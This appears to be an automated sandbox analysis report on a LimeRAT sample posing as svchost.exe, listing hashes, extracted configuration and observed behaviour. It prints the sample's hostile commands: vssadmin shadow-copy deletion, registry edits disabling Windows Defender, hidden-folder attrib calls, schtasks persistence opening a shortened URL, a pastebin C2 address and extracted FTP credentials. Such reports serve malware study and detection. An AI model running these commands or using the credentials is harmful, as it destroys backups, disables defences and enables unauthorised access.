Analysis
-
max time kernel
190s -
max time network
169s -
platform
windows10-2004_x64 -
resource
win10v2004-20240611-en -
resource tags
arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system -
submitted
19-06-2024 22:02
Behavioral task
behavioral1
Sample
svchost.exe
Resource
win10-20240404-en
windows10-1703-x64
27 signatures
1200 seconds
Behavioral task
behavioral2
Sample
svchost.exe
Resource
win10v2004-20240611-en
windows10-2004-x64
26 signatures
1200 seconds
General
-
Target
svchost.exe
-
Size
242KB
-
MD5
05e991bcf019b487f7ad4e896c77e988
-
SHA1
f4a93e4ce16dba10cdc835fe1ae71da3dd88f73a
-
SHA256
cb87011623c7e41c0a449814e76c887543e6e39e6ab3864c7cc3636dcf09e196
-
SHA512
4f4ee0153af79dbb6352b1382cbee3b5af72c64f827450d2a681fd2b3177304ac1c6626c055159facb84aca9f8ba6aa9d1265d5fb148080e566903949081cfb3
-
SSDEEP
6144:GpCE/UVPy/oCa+LDZWC9z5B0bmknq1difFN:6CzPygCa+DZ+nq1cT
Malware Config
Extracted
Credentials
Protocol: ftp- Host:
ftp.encompossoftware.com - Port:
21 - Username:
remoteuser - Password:
Encomposx99
Extracted
Family
limerat
Wallets
False
Attributes
-
aes_key
1
-
antivm
false
-
c2_url
https://pastebin.com/raw/GfV4LBjE
-
download_payload
true
-
install
true
-
install_name
svchost.exe
-
main_folder
False
-
payload_url
True
-
pin_spread
true
-
sub_folder
False
-
usb_spread
false
Signatures
-
Contains code to disable Windows Defender 2 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
resource yara_rule behavioral2/memory/3084-0-0x0000026BF9F60000-0x0000026BF9FA2000-memory.dmp disable_win_def behavioral2/files/0x000400000001da7a-23.dat disable_win_def -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection svchost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" svchost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" svchost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" svchost.exe -
Modifies security service 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Start = "4" svchost.exe -
Modifies visibility of file extensions in Explorer 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" svchost.exe -
Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" svchost.exe -
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Control Panel\International\Geo\Nation svchost.exe -
Executes dropped EXE 1 IoCs
pid Process 280 svchost.exe -
Enumerates connected drives 3 TTPs 15 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\E: vssadmin.exe File opened (read-only) \??\g: vssadmin.exe File opened (read-only) \??\H: vssadmin.exe File opened (read-only) \??\E: vssadmin.exe File opened (read-only) \??\G: vssadmin.exe File opened (read-only) \??\D: vssadmin.exe File opened (read-only) \??\h: vssadmin.exe File opened (read-only) \??\h: vssadmin.exe File opened (read-only) \??\H: vssadmin.exe File opened (read-only) \??\G: vssadmin.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\e: vssadmin.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\e: vssadmin.exe File opened (read-only) \??\g: vssadmin.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
flow ioc 24 iplogger.org 25 iplogger.org 53 pastebin.com 58 pastebin.com -
Hide Artifacts: Hidden Files and Directories 1 TTPs 2 IoCs
pid Process 2308 cmd.exe 2824 cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Disables Windows logging functionality 2 TTPs
Changes registry settings to disable Windows Event logging.
-
Interacts with shadow copies 3 TTPs 12 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 2228 vssadmin.exe 1056 vssadmin.exe 4456 vssadmin.exe 2964 vssadmin.exe 4320 vssadmin.exe 2896 vssadmin.exe 1868 vssadmin.exe 3540 vssadmin.exe 4088 vssadmin.exe 1832 vssadmin.exe 2988 vssadmin.exe 2020 vssadmin.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2312 schtasks.exe 1656 schtasks.exe 2992 schtasks.exe 3620 schtasks.exe 4700 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3084 svchost.exe 3084 svchost.exe 3084 svchost.exe 3208 powershell.exe 3208 powershell.exe 280 svchost.exe 280 svchost.exe 280 svchost.exe 280 svchost.exe 280 svchost.exe 280 svchost.exe 280 svchost.exe 280 svchost.exe 280 svchost.exe 280 svchost.exe 280 svchost.exe 280 svchost.exe 280 svchost.exe 280 svchost.exe 280 svchost.exe 280 svchost.exe 280 svchost.exe 280 svchost.exe 280 svchost.exe 280 svchost.exe 280 svchost.exe 280 svchost.exe 280 svchost.exe 280 svchost.exe 280 svchost.exe 280 svchost.exe 280 svchost.exe 280 svchost.exe 280 svchost.exe 280 svchost.exe 280 svchost.exe 280 svchost.exe 280 svchost.exe 280 svchost.exe 280 svchost.exe 280 svchost.exe 280 svchost.exe 280 svchost.exe 280 svchost.exe 280 svchost.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 280 svchost.exe 280 svchost.exe 280 svchost.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe -
Suspicious use of AdjustPrivilegeToken 14 IoCs
description pid Process Token: SeDebugPrivilege 3084 svchost.exe Token: SeDebugPrivilege 3208 powershell.exe Token: SeBackupPrivilege 2028 vssvc.exe Token: SeRestorePrivilege 2028 vssvc.exe Token: SeAuditPrivilege 2028 vssvc.exe Token: SeBackupPrivilege 3084 svchost.exe Token: SeSecurityPrivilege 3084 svchost.exe Token: SeBackupPrivilege 3084 svchost.exe Token: SeDebugPrivilege 280 svchost.exe Token: SeDebugPrivilege 4376 taskmgr.exe Token: SeSystemProfilePrivilege 4376 taskmgr.exe Token: SeCreateGlobalPrivilege 4376 taskmgr.exe Token: 33 4376 taskmgr.exe Token: SeIncBasePriorityPrivilege 4376 taskmgr.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3084 wrote to memory of 2824 3084 svchost.exe 86 PID 3084 wrote to memory of 2824 3084 svchost.exe 86 PID 2824 wrote to memory of 4716 2824 cmd.exe 88 PID 2824 wrote to memory of 4716 2824 cmd.exe 88 PID 2824 wrote to memory of 4404 2824 cmd.exe 89 PID 2824 wrote to memory of 4404 2824 cmd.exe 89 PID 3084 wrote to memory of 3208 3084 svchost.exe 92 PID 3084 wrote to memory of 3208 3084 svchost.exe 92 PID 3084 wrote to memory of 1308 3084 svchost.exe 95 PID 3084 wrote to memory of 1308 3084 svchost.exe 95 PID 3084 wrote to memory of 2504 3084 svchost.exe 96 PID 3084 wrote to memory of 2504 3084 svchost.exe 96 PID 3084 wrote to memory of 3804 3084 svchost.exe 97 PID 3084 wrote to memory of 3804 3084 svchost.exe 97 PID 3084 wrote to memory of 888 3084 svchost.exe 98 PID 3084 wrote to memory of 888 3084 svchost.exe 98 PID 3084 wrote to memory of 3128 3084 svchost.exe 99 PID 3084 wrote to memory of 3128 3084 svchost.exe 99 PID 3084 wrote to memory of 2464 3084 svchost.exe 100 PID 3084 wrote to memory of 2464 3084 svchost.exe 100 PID 3084 wrote to memory of 2520 3084 svchost.exe 101 PID 3084 wrote to memory of 2520 3084 svchost.exe 101 PID 3084 wrote to memory of 752 3084 svchost.exe 102 PID 3084 wrote to memory of 752 3084 svchost.exe 102 PID 3084 wrote to memory of 1652 3084 svchost.exe 103 PID 3084 wrote to memory of 1652 3084 svchost.exe 103 PID 3084 wrote to memory of 532 3084 svchost.exe 104 PID 3084 wrote to memory of 532 3084 svchost.exe 104 PID 3084 wrote to memory of 3776 3084 svchost.exe 105 PID 3084 wrote to memory of 3776 3084 svchost.exe 105 PID 3084 wrote to memory of 1484 3084 svchost.exe 106 PID 3084 wrote to memory of 1484 3084 svchost.exe 106 PID 3084 wrote to memory of 4284 3084 svchost.exe 107 PID 3084 wrote to memory of 4284 3084 svchost.exe 107 PID 888 wrote to memory of 3540 888 cmd.exe 121 PID 888 wrote to memory of 3540 888 cmd.exe 121 PID 3128 wrote to memory of 4088 3128 cmd.exe 122 PID 3128 wrote to memory of 4088 3128 cmd.exe 122 PID 2520 wrote to memory of 1056 2520 cmd.exe 123 PID 2520 wrote to memory of 1056 2520 cmd.exe 123 PID 1308 wrote to memory of 4456 1308 cmd.exe 125 PID 1308 wrote to memory of 4456 1308 cmd.exe 125 PID 3804 wrote to memory of 1832 3804 cmd.exe 126 PID 3804 wrote to memory of 1832 3804 cmd.exe 126 PID 532 wrote to memory of 2988 532 cmd.exe 127 PID 532 wrote to memory of 2988 532 cmd.exe 127 PID 1484 wrote to memory of 2964 1484 cmd.exe 128 PID 1484 wrote to memory of 2964 1484 cmd.exe 128 PID 2504 wrote to memory of 3044 2504 cmd.exe 129 PID 2504 wrote to memory of 3044 2504 cmd.exe 129 PID 1652 wrote to memory of 4320 1652 cmd.exe 132 PID 1652 wrote to memory of 4320 1652 cmd.exe 132 PID 3776 wrote to memory of 2020 3776 cmd.exe 131 PID 3776 wrote to memory of 2020 3776 cmd.exe 131 PID 2464 wrote to memory of 2228 2464 cmd.exe 130 PID 2464 wrote to memory of 2228 2464 cmd.exe 130 PID 752 wrote to memory of 2896 752 cmd.exe 133 PID 752 wrote to memory of 2896 752 cmd.exe 133 PID 4284 wrote to memory of 1868 4284 cmd.exe 134 PID 4284 wrote to memory of 1868 4284 cmd.exe 134 PID 3084 wrote to memory of 2992 3084 svchost.exe 138 PID 3084 wrote to memory of 2992 3084 svchost.exe 138 PID 3084 wrote to memory of 3620 3084 svchost.exe 139 PID 3084 wrote to memory of 3620 3084 svchost.exe 139 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Run\svchost.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Branding\\svchost.exe" svchost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Run\svchost.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Branding\\svchost.exe" svchost.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Run svchost.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 4 IoCs
pid Process 4716 attrib.exe 4404 attrib.exe 2968 attrib.exe 1908 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\svchost.exe"C:\Users\Admin\AppData\Local\Temp\svchost.exe"1⤵
- Modifies Windows Defender Real-time Protection settings
- Modifies security service
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:3084 -
C:\Windows\SYSTEM32\cmd.execmd /c attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding" & attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding\*" /S /D2⤵
- Hide Artifacts: Hidden Files and Directories
- Suspicious use of WriteProcessMemory
PID:2824 -
C:\Windows\system32\attrib.exeattrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding"3⤵
- Views/modifies file attributes
PID:4716
-
-
C:\Windows\system32\attrib.exeattrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding\*" /S /D3⤵
- Views/modifies file attributes
PID:4404
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3208
-
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin Delete Shadows /all /quiet2⤵
- Suspicious use of WriteProcessMemory
PID:1308 -
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:4456
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin resize shadow /for=c: /on=c: /maxsize=401MB2⤵
- Suspicious use of WriteProcessMemory
PID:2504 -
C:\Windows\system32\vssadmin.exevssadmin resize shadow /for=c: /on=c: /maxsize=401MB3⤵PID:3044
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded2⤵
- Suspicious use of WriteProcessMemory
PID:3804 -
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:1832
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded2⤵
- Suspicious use of WriteProcessMemory
PID:888 -
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:3540
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB2⤵
- Suspicious use of WriteProcessMemory
PID:3128 -
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4088
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded2⤵
- Suspicious use of WriteProcessMemory
PID:2464 -
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2228
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB2⤵
- Suspicious use of WriteProcessMemory
PID:2520 -
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1056
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded2⤵
- Suspicious use of WriteProcessMemory
PID:752 -
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2896
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB2⤵
- Suspicious use of WriteProcessMemory
PID:1652 -
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4320
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded2⤵
- Suspicious use of WriteProcessMemory
PID:532 -
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2988
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB2⤵
- Suspicious use of WriteProcessMemory
PID:3776 -
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2020
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded2⤵
- Suspicious use of WriteProcessMemory
PID:1484 -
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2964
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c Vssadmin delete shadowstorage /all /quiet2⤵
- Suspicious use of WriteProcessMemory
PID:4284 -
C:\Windows\system32\vssadmin.exeVssadmin delete shadowstorage /all /quiet3⤵
- Interacts with shadow copies
PID:1868
-
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /f /st "11:59" /sc daily /mo "1" /tn "AD RMS Rights Policy Template Management (Automated)" /tr "'explorer'https://bit.ly/3hfQB4H"2⤵
- Scheduled Task/Job: Scheduled Task
PID:2992
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /f /st "08:33" /sc daily /mo "3" /tn "AD RMS Rights Policy Template Management (Automated)" /tr "'explorer'https://bit.ly/3hfQB4H"2⤵
- Scheduled Task/Job: Scheduled Task
PID:3620
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /f /st "10:17" /sc daily /mo "5" /tn "AD RMS Rights Policy Template Management (Automated)" /tr "'explorer'https://bit.ly/3hfQB4H"2⤵
- Scheduled Task/Job: Scheduled Task
PID:4700
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /f /st "10:36" /sc weekly /mo "2" /d "Sat" /tn "AD RMS Rights Policy Template Management (Automated)" /tr "'explorer'https://bit.ly/3hfQB4H"2⤵
- Scheduled Task/Job: Scheduled Task
PID:1656
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /f /st "03:18" /sc monthly /m "may" /tn "AD RMS Rights Policy Template Management (Automated)" /tr "'explorer'https://bit.ly/3hfQB4H"2⤵
- Scheduled Task/Job: Scheduled Task
PID:2312
-
-
C:\Users\Admin\AppData\Roaming\Branding\svchost.exe"C:\Users\Admin\AppData\Roaming\Branding\svchost.exe"2⤵
- Modifies visibility of file extensions in Explorer
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- System policy modification
PID:280 -
C:\Windows\SYSTEM32\cmd.execmd /c attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding" & attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding\*" /S /D3⤵
- Hide Artifacts: Hidden Files and Directories
PID:2308 -
C:\Windows\system32\attrib.exeattrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding"4⤵
- Views/modifies file attributes
PID:2968
-
-
C:\Windows\system32\attrib.exeattrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding\*" /S /D4⤵
- Views/modifies file attributes
PID:1908
-
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2028
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4376
Network
MITRE ATT&CK Enterprise v15
Execution
Scheduled Task/Job
1Scheduled Task
1Windows Management Instrumentation
1Persistence
Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Direct Volume Access
1Hide Artifacts
4Hidden Files and Directories
4Impair Defenses
2Disable or Modify Tools
2Indicator Removal
2File Deletion
2Modify Registry
6Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5f6d83cb3ec0cf035c26b86a8009ab714
SHA19c2d16be04908f2d28ce66b41ca4487b618534b3
SHA2562abe8a8f5bc11a760fed80a31be099fc4ffe88cf786ccec2d6b0610877910212
SHA5129f94dfc2f18ab2130698724a6a6e54c3ddb4f7695b60e71eaee9b2ed0ca09fdc30830bf70de450814260c771674988999b8b94bf78dec6cbb068c8bd073b1696
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
242KB
MD505e991bcf019b487f7ad4e896c77e988
SHA1f4a93e4ce16dba10cdc835fe1ae71da3dd88f73a
SHA256cb87011623c7e41c0a449814e76c887543e6e39e6ab3864c7cc3636dcf09e196
SHA5124f4ee0153af79dbb6352b1382cbee3b5af72c64f827450d2a681fd2b3177304ac1c6626c055159facb84aca9f8ba6aa9d1265d5fb148080e566903949081cfb3